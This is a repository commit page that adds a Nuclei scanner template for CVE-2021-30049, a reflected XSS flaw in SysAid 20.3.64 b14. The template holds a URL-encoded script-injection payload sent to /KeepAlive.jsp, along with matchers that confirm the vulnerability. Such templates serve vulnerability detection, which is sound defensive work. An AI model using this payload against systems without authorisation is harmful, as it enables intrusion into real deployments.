daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2700 from daffainfo/patch-221 

Create CVE-2021-30049.yaml
patch-1
Prince Chaddha 2021-09-17 18:13:01 +05:30 committed by GitHub
parent 3deb522abc 0d9d58a46b
commit 37a1a37e00
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
cves/2021/CVE-2021-30049.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-30049
info:
name: SysAid Technologies 20.3.64 b14 Reflected XSS
author: daffainfo
severity: medium
description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI.
reference:
- https://eh337.net/2021/03/30/sysaid/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049
tags: cve,cve2021,xss
requests:
- method: GET
path:
- '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200